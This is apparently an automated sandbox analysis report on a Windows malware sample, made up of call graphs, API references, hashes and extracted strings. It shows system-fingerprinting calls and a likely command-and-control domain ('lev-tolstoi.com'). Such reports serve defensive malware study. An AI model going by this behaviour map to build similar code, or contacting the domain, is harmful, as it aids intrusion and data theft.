20332->20333 20334 ac7440 RtlFreeHeap LdrInitializeThunk 20333->20334 20335 aacdac 20334->20335 20336 ac7740 RtlFreeHeap LdrInitializeThunk 20335->20336 20337 aacdb5 20336->20337 20338 ac9e80 RtlExpandEnvironmentStrings 20337->20338 20339 aacdbe 20338->20339 20340 ac90d0 RtlExpandEnvironmentStrings 20339->20340 20341 aacdda 20340->20341 20343 ac4360 20342->20343 20343->20343 20344 ac4376 RtlExpandEnvironmentStrings 20343->20344 20345 ac43d0 20344->20345 20347 ac46e1 20345->20347 20349 ac4431 RtlExpandEnvironmentStrings 20345->20349 20352 ac4450 20345->20352 20390 ae06f0 RtlFreeHeap LdrInitializeThunk 20345->20390 20391 ae0460 20347->20391 20349->20345 20349->20347 20349->20352 20352->20319 20352->20352 20354 ac456e 20353->20354 20355 ae0340 LdrInitializeThunk 20354->20355 20357 ac4408 20355->20357 20358 ac46e1 20357->20358 20361 ac4431 RtlExpandEnvironmentStrings 20357->20361 20363 ac4450 20357->20363 20406 ae06f0 RtlFreeHeap LdrInitializeThunk 20357->20406 20359 ae0460 2 API calls 20358->20359 20360 ac4712 20359->20360 20362 ae0340 LdrInitializeThunk 20360->20362 20360->20363 20361->20357 20361->20358 20361->20363 20362->20363 20363->20321 20365 ac7460 20364->20365 20368 ac74ae 20365->20368 20407 ade110 LdrInitializeThunk 20365->20407 20366 aacce6 20372 ac7740 20366->20372 20368->20366 20371 ac756e 20368->20371 20408 ade110 LdrInitializeThunk 20368->20408 20369 adc570 RtlFreeHeap 20369->20366 20371->20369 20409 ac7760 RtlFreeHeap LdrInitializeThunk 20372->20409 20374 ac7754 20374->20325 20375 ac7749 20375->20374 20410 ada2a0 RtlFreeHeap LdrInitializeThunk 20375->20410 20377 ac8080 20377->20325 20378 ae1320 LdrInitializeThunk 20381 ac804c 20378->20381 20380 ae1720 LdrInitializeThunk 20380->20381 20381->20377 20381->20378 20381->20380 20411 ae1650 LdrInitializeThunk 20381->20411 20383 ac9f10 20382->20383 20383->20383 20384 ac9f37 RtlExpandEnvironmentStrings 20383->20384 20385 ac9dd1 20384->20385 20385->20327 20387 ac9110 20386->20387 20387->20387 20388 ac9136 RtlExpandEnvironmentStrings 20387->20388 20389 ac9180 20388->20389 20389->20389 20390->20345 20392 ae0480 20391->20392 20395 ae04ce 20392->20395 20403 ade110 LdrInitializeThunk 20392->20403 20393 ac4712 20393->20352 20399 ae0340 20393->20399 20395->20393 20398 ae05af 20395->20398 20404 ade110 LdrInitializeThunk 20395->20404 20396 adc570 RtlFreeHeap 20396->20393 20398->20396 20398->20398 20400 ae0360 20399->20400 20401 ae042f 20400->20401 20405 ade110 LdrInitializeThunk 20400->20405 20401->20352 20403->20395 20404->20398 20405->20401 20406->20357 20407->20368 20408->20371 20409->20375 20410->20381 20411->20381 20193 ac39b9 20195 ac374a 20193->20195 20206 ac3406 20193->20206 20194 ac3b50 RtlExpandEnvironmentStrings 20197 ac3c50 20194->20197 20195->20193 20195->20194 20195->20195 20195->20197 20202 ac3ce2 20195->20202 20195->20206 20220 ade110 LdrInitializeThunk 20195->20220 20198 ac3c9e RtlExpandEnvironmentStrings 20197->20198 20199 ac3f58 20197->20199 20197->20202 20204 ac3def 20197->20204 20197->20206 20198->20199 20198->20202 20198->20204 20198->20206 20199->20199 20199->20206 20207 ac1d00 20199->20207 20202->20202 20203 ae14b0 LdrInitializeThunk 20202->20203 20203->20204 20204->20199 20204->20204 20205 ae14b0 LdrInitializeThunk 20204->20205 20204->20206 20205->20199 20208 ae1320 LdrInitializeThunk 20207->20208 20209 ac1d43 20208->20209 20212 ac23f5 20209->20212 20218 ac1de9 20209->20218 20221 ade110 LdrInitializeThunk 20209->20221 20211 adc570 RtlFreeHeap 20213 ac239e 20211->20213 20212->20206 20213->20212 20223 ade110 LdrInitializeThunk 20213->20223 20215 ac2383 20215->20211 20216 ac245a 20215->20216 20218->20215 20219 adc570 RtlFreeHeap 20218->20219 20222 ade110 LdrInitializeThunk 20218->20222 20219->20218 20220->20195 20221->20209 20222->20218 20223->20213 20412 aade73 20413 aaded0 20412->20413 20414 aadf1e 20413->20414 20416 ade110 LdrInitializeThunk 20413->20416 20416->20414 20417 acdc76 20418 acdc7c 20417->20418 20418->20418 20419 acdcf0 GetComputerNameExA 20418->20419 20420 ac18f0 20421 ac18fe 20420->20421 20424 ac1950 20420->20424 20426 ac1a10 20421->20426 20427 ac1a20 20426->20427 20427->20427 20428 ae14b0 LdrInitializeThunk 20427->20428 20429 ac1b0f 20428->20429 20224 aa9eb7 20227 adfe00 20224->20227 20226 aa9ec7 WSAStartup 20228 adfe20 20227->20228 20228->20226 20228->20228 20430 aaec77 20431 aaec8e CoInitializeSecurity 20430->20431 20229 adeb88 20231 adeba0 20229->20231 20230 adec4e 20233 adebde 20231->20233 20236 ade110 LdrInitializeThunk 20231->20236 20233->20230 20235 ade110 LdrInitializeThunk 20233->20235 20235->20230 20236->20233 20432 acd34a 20433 acd370 20432->20433 20434 acd3ea GetPhysicallyInstalledSystemMemory 20433->20434 20435 acd410 20434->20435 20435->20435 20237 aa8600 20238 aa860f 20237->20238 20239 aa8a48 ExitProcess 20238->20239 20240 aa8a31 20238->20240 20243 aab7b0 FreeLibrary FreeLibrary 20238->20243 20244 ade080 FreeLibrary 20240->20244 20243->20240 20244->20239 20245 af9703 20246 af9c66 VirtualAlloc 20245->20246 20248 afa0c9 20246->20248 20249 aae687 20250 aae6a0 20249->20250 20255 ad9280 20250->20255 20252 aae77a 20253 ad9280 5 API calls 20252->20253 20254 aae908 20253->20254 20254->20254 20256 ad92b0 20255->20256 20256->20256 20257 ad954f SysAllocString 20256->20257 20261 ad98eb 20256->20261 20259 ad9574 20257->20259 20258 ad9916 GetVolumeInformationW 20262 ad9934 20258->20262 20260 ad957c CoSetProxyBlanket 20259->20260 20259->20261 20260->20261 20264 ad959c 20260->20264 20261->20258 20262->20252 20263 ad98d6 SysFreeString SysFreeString 20263->20261 20264->20263 20436 aace45 20437 aace4b 20436->20437 20438 aace55 CoUninitialize 20437->20438 20439 aace80 20438->20439 20439->20439 20440 adc55c RtlAllocateHeap 20275 aa9d1e 20276 aa9d40 20275->20276 20276->20276 20277 aa9d94 LoadLibraryExW 20276->20277 20278 aa9da5 20277->20278 20279 aa9e74 LoadLibraryExW 20278->20279 20280 aa9e85 20279->20280 20441 aaef53 20442 aaef5c CoInitializeEx 20441->20442 20281 acd893 20282 acd896 FreeLibrary 20281->20282 20283 acdbc9 20282->20283 20283->20283 20284 acdc30 GetComputerNameExA 20283->20284

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00AC2E6D Relevance: 45.3, APIs: 2, Strings: 23, Instructions: 1505COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$lev-tolstoi.com$s$wdnf$~SS}$rp
                                                                                                                                                                                                                                                • API String ID: 0-796191818
                                                                                                                                                                                                                                                • Opcode ID: 1accadc007253980595cf19b768b9345a277f4b93f321b9e4abb705ff018cf04
                                                                                                                                                                                                                                                • Instruction ID: 3bfe4ed010054be00e261470796bfda8f25f27267d97995e6606850525936b9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1accadc007253980595cf19b768b9345a277f4b93f321b9e4abb705ff018cf04
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7B216B2A08341CFD714CF69C891BABBBE2FF95310F19896CE4959B391D7349902CB91
                                                                                                                                                                                                                                                Function 00AB57C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                                • API String ID: 0-510280711
                                                                                                                                                                                                                                                • Opcode ID: d8493b425aa1b8611ebdd46469ee0fb0a86f5a658273ba6827f227e232fbed9c
                                                                                                                                                                                                                                                • Instruction ID: ed130ae38880d1a3f929f3e8cd6f17bbc31f00b1a9b9b01a2ad48de96194a908
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8493b425aa1b8611ebdd46469ee0fb0a86f5a658273ba6827f227e232fbed9c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36C206B1A083508FD724CF28D8917ABB7E5FF96314F19893CE4D98B292E7359901CB52
                                                                                                                                                                                                                                                Function 00AC1D00 Relevance: 26.8, Strings: 21, Instructions: 506COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 575 ac1d00-ac1d48 call ae1320 578 ac1d4e-ac1db8 call ab4c70 call adc540 575->578 579 ac2449-ac2459 575->579 584 ac1dba-ac1dbd 578->584 585 ac1dbf-ac1dd4 584->585 586 ac1dd6-ac1dda 584->586 585->584 587 ac1ddc-ac1de7 586->587 588 ac1dee-ac1e05 587->588 589 ac1de9 587->589 591 ac1e0c-ac1e17 588->591 592 ac1e07-ac1e95 588->592 590 ac1ea8-ac1eab 589->590 593 ac1ead 590->593 594 ac1eaf-ac1eb4 590->594 596 ac1e19-ac1e89 call ade110 591->596 597 ac1e97-ac1e9c 591->597 592->597 593->594 600 ac1eba-ac1eca 594->600 601 ac2392-ac23c7 call adc570 594->601 605 ac1e8e-ac1e93 596->605 598 ac1e9e 597->598 599 ac1ea0-ac1ea3 597->599 598->590 599->587 603 ac1ecc-ac1ee9 600->603 611 ac23c9-ac23cc 601->611 606 ac1eef-ac1f13 603->606 607 ac207b-ac2083 603->607 605->597 610 ac1f17-ac1f1a 606->610 609 ac2085-ac2088 607->609 612 ac208a-ac208e 609->612 613 ac2090-ac20a1 call adc540 609->613 614 ac1f1c-ac1f31 610->614 615 ac1f33-ac1f4d call ac2460 610->615 616 ac23ce-ac23e3 611->616 617 ac23e5-ac23eb 611->617 618 ac20b5-ac20b7 612->618 633 ac20b1-ac20b3 613->633 634 ac20a3-ac20ac 613->634 614->610 615->607 636 ac1f53-ac1f7c 615->636 616->611 621 ac23ed-ac23f3 617->621 625 ac20bd-ac20e0 618->625 626 ac2358-ac2363 618->626 622 ac23f5 621->622 623 ac23f7-ac2409 621->623 630 ac2447 622->630 631 ac240d-ac2413 623->631 632 ac240b 623->632 635 ac20e2-ac20e5 625->635 628 ac2365-ac2375 626->628 629 ac2367-ac236f 626->629 638 ac2377 628->638 629->638 630->579 639 ac243b-ac243e 631->639 640 ac2415-ac2437 call ade110 631->640 632->639 633->618 641 ac2379-ac237d 634->641 642 ac211a-ac2157 635->642 643 ac20e7-ac2118 635->643 644 ac1f7e-ac1f81 636->644 638->641 649 ac2440 639->649 650 ac2442-ac2445 639->650 640->639 641->603 648 ac2383-ac2388 641->648 651 ac215b-ac215e 642->651 643->635 645 ac1fae-ac1fc5 call ac2460 644->645 646 ac1f83-ac1fac 644->646 663 ac1fd4-ac1feb 645->663 664 ac1fc7-ac1fcf 645->664 646->644 659 ac238e-ac2390 648->659 660 ac245a 648->660 649->630 650->621 655 ac2177-ac217f 651->655 656 ac2160-ac2175 651->656 657 ac2181-ac218c 655->657 656->651 661 ac218e 657->661 662 ac2193-ac21aa 657->662 659->601 666 ac2259-ac2260 661->666 667 ac21ac-ac2246 662->667 668 ac21b1-ac21be 662->668 669 ac1fed 663->669 670 ac1fef-ac2079 call aa7f50 call ab48c0 call aa7f60 663->670 664->609 675 ac2266-ac2289 666->675 676 ac2262 666->676 672 ac2248-ac224d 667->672 668->672 673 ac21c4-ac223a call ade110 668->673 669->670 670->609 679 ac224f 672->679 680 ac2251-ac2254 672->680 684 ac223f-ac2244 673->684 681 ac228b-ac228e 675->681 676->675 679->666 680->657 682 ac22ed-ac2301 681->682 683 ac2290-ac22eb 681->683 686 ac2333-ac2336 682->686 687 ac2303-ac2307 682->687 683->681 684->672 690 ac2338-ac2345 call adc570 686->690 691 ac2347-ac2349 686->691 689 ac2309-ac2310 687->689 692 ac2320-ac2323 689->692 693 ac2312-ac231e 689->693 695 ac234b-ac234e 690->695 691->695 697 ac232b-ac2331 692->697 698 ac2325 692->698 693->689 695->626 700 ac2350-ac2356 695->700 697->686 698->697 700->641
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                                • API String ID: 0-1565257739
                                                                                                                                                                                                                                                • Opcode ID: 8052a24dafabc51f7fc8a7f3f86308ebd708d54d13c7d5ea4afd0f673d5395fd
                                                                                                                                                                                                                                                • Instruction ID: 38657164fcceb609cde32a237b5d5c47d81274047e288204c7ce3ec715561fa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8052a24dafabc51f7fc8a7f3f86308ebd708d54d13c7d5ea4afd0f673d5395fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5922AD7150C7808FD324DB28C481B6FBBE1AB96314F1A492EE4DA8B392D779D845CB43
                                                                                                                                                                                                                                                Function 00AD9280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 703 ad9280-ad92a4 704 ad92b0-ad92d7 703->704 704->704 705 ad92d9-ad92ef 704->705 706 ad92f0-ad9322 705->706 706->706 707 ad9324-ad936a 706->707 708 ad9370-ad938c 707->708 708->708 709 ad938e-ad93a7 708->709 711 ad93ad-ad93b6 709->711 712 ad942a-ad9435 709->712 714 ad93c0-ad93d9 711->714 713 ad9440-ad947b 712->713 713->713 715 ad947d-ad94de 713->715 714->714 716 ad93db-ad93ee 714->716 720 ad94e4-ad9515 715->720 721 ad9906-ad9932 call adfe00 GetVolumeInformationW 715->721 717 ad93f0-ad941e 716->717 717->717 719 ad9420-ad9425 717->719 719->712 722 ad9520-ad954d 720->722 726 ad993c-ad993e 721->726 727 ad9934-ad9938 721->727 722->722 724 ad954f-ad9576 SysAllocString 722->724 730 ad957c-ad9596 CoSetProxyBlanket 724->730 731 ad98f5-ad9902 724->731 729 ad9950-ad9957 726->729 727->726 732 ad9959-ad9960 729->732 733 ad9970-ad998f 729->733 734 ad959c-ad95b4 730->734 735 ad98eb-ad98f1 730->735 731->721 732->733 736 ad9962-ad996e 732->736 737 ad9990-ad99b2 733->737 740 ad95c0-ad961e 734->740 735->731 736->733 737->737 738 ad99b4-ad99ca 737->738 741 ad99d0-ad9a06 738->741 740->740 742 ad9620-ad969f 740->742 741->741 743 ad9a08-ad9a2e call abe960 741->743 746 ad96a0-ad96ff 742->746 749 ad9a30-ad9a37 743->749 746->746 748 ad9701-ad972d 746->748 758 ad98d6-ad98e7 SysFreeString * 2 748->758 759 ad9733-ad9755 748->759 749->749 750 ad9a39-ad9a4c 749->750 752 ad9940-ad994a 750->752 753 ad9a52-ad9a65 call aa7fd0 750->753 752->729 755 ad9a6a-ad9a71 752->755 753->752 758->735 761 ad98cc-ad98d2 759->761 762 ad975b-ad975e 759->762 761->758 762->761 763 ad9764-ad9769 762->763 763->761 764 ad976f-ad97b7 763->764 766 ad97c0-ad97d4 764->766 766->766 767 ad97d6-ad97e0 766->767 768 ad97e4-ad97e6 767->768 769 ad97ec-ad97f2 768->769 770 ad98bb-ad98c8 768->770 769->770 771 ad97f8-ad9806 769->771 770->761 772 ad983d 771->772 773 ad9808-ad980d 771->773 776 ad983f-ad9877 call aa7f50 call aa8e10 772->776 775 ad981c-ad9820 773->775 777 ad9810 775->777 778 ad9822-ad982b 775->778 787 ad9879-ad988f 776->787 788 ad98a7-ad98b7 call aa7f60 776->788 780 ad9811-ad981a 777->780 781 ad982d-ad9830 778->781 782 ad9832-ad9836 778->782 780->775 780->776 781->780 782->780 785 ad9838-ad983b 782->785 785->780 787->788 789 ad9891-ad989e 787->789 788->770 789->788 791 ad98a0-ad98a3 789->791 791->788
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00001F7A), ref: 00AD9551
                                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AD958F
                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 00AD98DF
                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AD98E5
                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 00AD992E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                                • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                                • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                                • Opcode ID: 41d86b3a76b8d4258dd2822e9d01348e9823dd0e7b22c2938e12559fb3fa1eec
                                                                                                                                                                                                                                                • Instruction ID: 71222953535de7db6d40b09e00e79b8b4f02147c327daa01337ce3f649eb350c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41d86b3a76b8d4258dd2822e9d01348e9823dd0e7b22c2938e12559fb3fa1eec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE223276A083419BD310CF28C880B5FBBE2EFC5714F18892DE9959B3A1D775D845CB82
                                                                                                                                                                                                                                                Function 00AAB100 Relevance: 19.2, Strings: 15, Instructions: 425COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 793 aab100-aab18b 794 aab190-aab199 793->794 794->794 795 aab19b-aab1ae 794->795 797 aab40b-aab40f 795->797 798 aab4be-aab4c7 795->798 799 aab52f-aab538 795->799 800 aab1bc-aab3db 795->800 801 aab4f6-aab4fd 795->801 802 aab414-aab4b7 call aa7e30 795->802 803 aab4e4-aab4ef 795->803 804 aab1b5-aab1b7 795->804 831 aab6d3-aab6dc 797->831 806 aab4ce-aab4df 798->806 807 aab4ff-aab52a call adfe00 798->807 830 aab540-aab56a 799->830 829 aab3e0-aab3eb 800->829 827 aab572-aab592 801->827 802->798 802->799 802->801 802->803 808 aab748-aab76d 802->808 809 aab789 802->809 810 aab689-aab697 802->810 811 aab76f 802->811 812 aab66f-aab687 call adfe00 802->812 813 aab782 802->813 814 aab5e3-aab5f0 802->814 815 aab623-aab640 802->815 816 aab780 802->816 817 aab647-aab657 802->817 818 aab65e-aab668 802->818 819 aab6fe-aab710 802->819 820 aab79f 802->820 821 aab69c-aab6b1 802->821 822 aab792-aab79a 802->822 823 aab6f0-aab6f1 802->823 824 aab610-aab61e 802->824 825 aab717-aab732 call ade0a0 802->825 826 aab5f7-aab60e call adfe00 802->826 803->799 803->801 803->808 803->809 803->810 803->811 803->812 803->813 803->814 803->815 803->816 803->817 803->818 803->819 803->820 803->821 803->822 803->823 803->824 803->825 803->826 828 aab6df-aab6e6 804->828 833 aab6c6-aab6d0 806->833 807->833 843 aab774-aab77a 808->843 809->822 834 aab7a2-aab7a9 810->834 811->843 812->810 813->809 814->824 814->826 815->808 815->809 815->810 815->811 815->812 815->813 815->816 815->817 815->818 815->819 815->820 815->821 815->822 815->823 815->824 815->825 815->826 817->808 817->809 817->810 817->811 817->812 817->813 817->816 817->818 817->819 817->820 817->821 817->822 817->823 817->824 817->825 817->826 818->810 818->812 818->824 818->826 819->808 819->809 819->810 819->811 819->812 819->813 819->816 819->820 819->824 819->825 819->826 820->834 839 aab6ba-aab6bd 821->839 822->823 849 aab6f8 823->849 824->839 851 aab737-aab741 825->851 826->824 837 aab5a0-aab5bd 827->837 829->829 842 aab3ed-aab3f8 829->842 830->830 836 aab56c-aab56f 830->836 831->828 833->831 834->839 836->827 837->837 848 aab5bf-aab5dc 837->848 839->833 857 aab3fb-aab404 842->857 843->816 848->808 848->809 848->810 848->811 848->812 848->813 848->814 848->815 848->816 848->817 848->818 848->819 848->820 848->821 848->822 848->823 848->824 848->825 848->826 849->819 851->808 851->809 851->810 851->811 851->812 851->813 851->816 851->820 851->824 851->826 857->797 857->798 857->799 857->801 857->802 857->803 857->808 857->809 857->810 857->811 857->812 857->813 857->814 857->815 857->816 857->817 857->818 857->819 857->820 857->821 857->822 857->823 857->824 857->825 857->826
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
